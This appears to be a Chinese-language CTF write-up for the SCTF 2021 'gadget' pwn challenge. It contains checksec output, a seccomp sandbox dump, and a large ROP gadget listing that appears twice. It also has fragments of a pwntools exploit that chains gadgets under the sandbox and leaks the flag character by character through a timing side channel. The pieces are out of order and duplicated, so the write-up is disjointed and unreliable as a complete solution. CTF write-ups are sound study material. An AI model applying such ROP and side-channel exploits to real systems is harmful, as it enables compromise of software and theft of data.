[*] '/home/rootzhang/get-shell/sctf2021/gadget/gadget' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
沙盒分析
1 2 3 4 5 6 7 8 9 10 11
rootzhang@ubuntu:~/get-shell/sctf2021/gadget$ seccomp-tools dump ./gadget line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000000 A = sys_number 0001: 0x25 0x03 0x00 0x40000000 if (A > 0x40000000) goto 0005 0002: 0x15 0x03 0x00 0x00000005 if (A == fstat) goto 0006 0003: 0x15 0x02 0x00 0x00000000 if (A == read) goto 0006 0004: 0x15 0x01 0x00 0x00000025 if (A == alarm) goto 0006 0005: 0x06 0x00 0x00 0x00000000 return KILL 0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
payload='\x00\x00\x00\x00\x00\x00\x00'+p64(alarm)+p64(0)+p64(pop_rsi_r15_rbp)+p64(push_rsi_ret)+p64(0)*2 payload+=p64(push_rsi_ret) sh.send(payload) start=time.time() try: sh.recv() except: end=time.time() asc=int(end-start) global flag flag+=chr(asc) print flag
from pwn import * import time context.arch='amd64' flag='' ''' 0x000000000040288d : pop r12 ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret 0x000000000040172f : pop r12 ; pop r14 ; pop r15 ; pop rbp ; ret 0x000000000040288f : pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000401731 : pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000401733 : pop r15 ; pop rbp ; ret 0x0000000000401001 : pop rax ; ret 0x0000000000402890 : pop rbp ; pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000401102 : pop rbp ; ret 0x000000000040172e : pop rbx ; pop r12 ; pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000403072 : pop rbx ; pop r14 ; pop r15 ; pop rbp ; ret 0x000000000040117b : pop rcx ; ret 0x0000000000401734 : pop rdi ; pop rbp ; ret 0x0000000000401732 : pop rsi ; pop r15 ; pop rbp ; ret 0x000000000040288e : pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000401730 : pop rsp ; pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000401002 : ret 0x0000000000402c04: mov rsi, r15; mov rdx, r12; call r14; mov edi, eax; call 0x1010; ret; x0000000000401102: pop rbp; ret; 0x0000000000409d1c: pop rsp; mov edi, 0x88bf2838; ret; 0x0000000000401001: pop rax; ret; 0x00000000004011f3: int 0x80; ret; 0x0000000000403072: pop rbx; pop r14; pop r15; pop rbp; ret; 0x000000000040117b: pop rcx; ret; 0x0000000000408865: syscall; ret; 0x0000000000401732: pop rsi; pop r15; pop rbp; ret; 0x00000000004011c5 : push rsi ; ret '''
第一类利用pop传值 (gadget/ELF/x86_64)> search pop|ret [INFO] Searching for gadgets: pop|ret
[INFO] File: ./gadget 0x000000000040288d: pop r12; pop r13; pop r14; pop r15; pop rbp; ret; 0x000000000040172f: pop r12; pop r14; pop r15; pop rbp; ret; 0x000000000040288f: pop r13; pop r14; pop r15; pop rbp; ret; 0x0000000000402be1: pop r14; pop r15; jmp rax;
第二类利用mov传值(这道题就用到了) (gadget/ELF/x86_64)> search mov|ret [INFO] Searching for gadgets: mov|ret
from pwn import * import time context.arch='amd64' flag='' ''' 0x000000000040288d : pop r12 ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret 0x000000000040172f : pop r12 ; pop r14 ; pop r15 ; pop rbp ; ret 0x000000000040288f : pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000401731 : pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000401733 : pop r15 ; pop rbp ; ret 0x0000000000401001 : pop rax ; ret 0x0000000000402890 : pop rbp ; pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000401102 : pop rbp ; ret 0x000000000040172e : pop rbx ; pop r12 ; pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000403072 : pop rbx ; pop r14 ; pop r15 ; pop rbp ; ret 0x000000000040117b : pop rcx ; ret 0x0000000000401734 : pop rdi ; pop rbp ; ret 0x0000000000401732 : pop rsi ; pop r15 ; pop rbp ; ret 0x000000000040288e : pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000401730 : pop rsp ; pop r14 ; pop r15 ; pop rbp ; ret 0x0000000000401002 : ret 0x0000000000402c04: mov rsi, r15; mov rdx, r12; call r14; mov edi, eax; call 0x1010; ret; x0000000000401102: pop rbp; ret; 0x0000000000409d1c: pop rsp; mov edi, 0x88bf2838; ret; 0x0000000000401001: pop rax; ret; 0x00000000004011f3: int 0x80; ret; 0x0000000000403072: pop rbx; pop r14; pop r15; pop rbp; ret; 0x000000000040117b: pop rcx; ret; 0x0000000000408865: syscall; ret; 0x0000000000401732: pop rsi; pop r15; pop rbp; ret; 0x00000000004011c5 : push rsi ; ret '''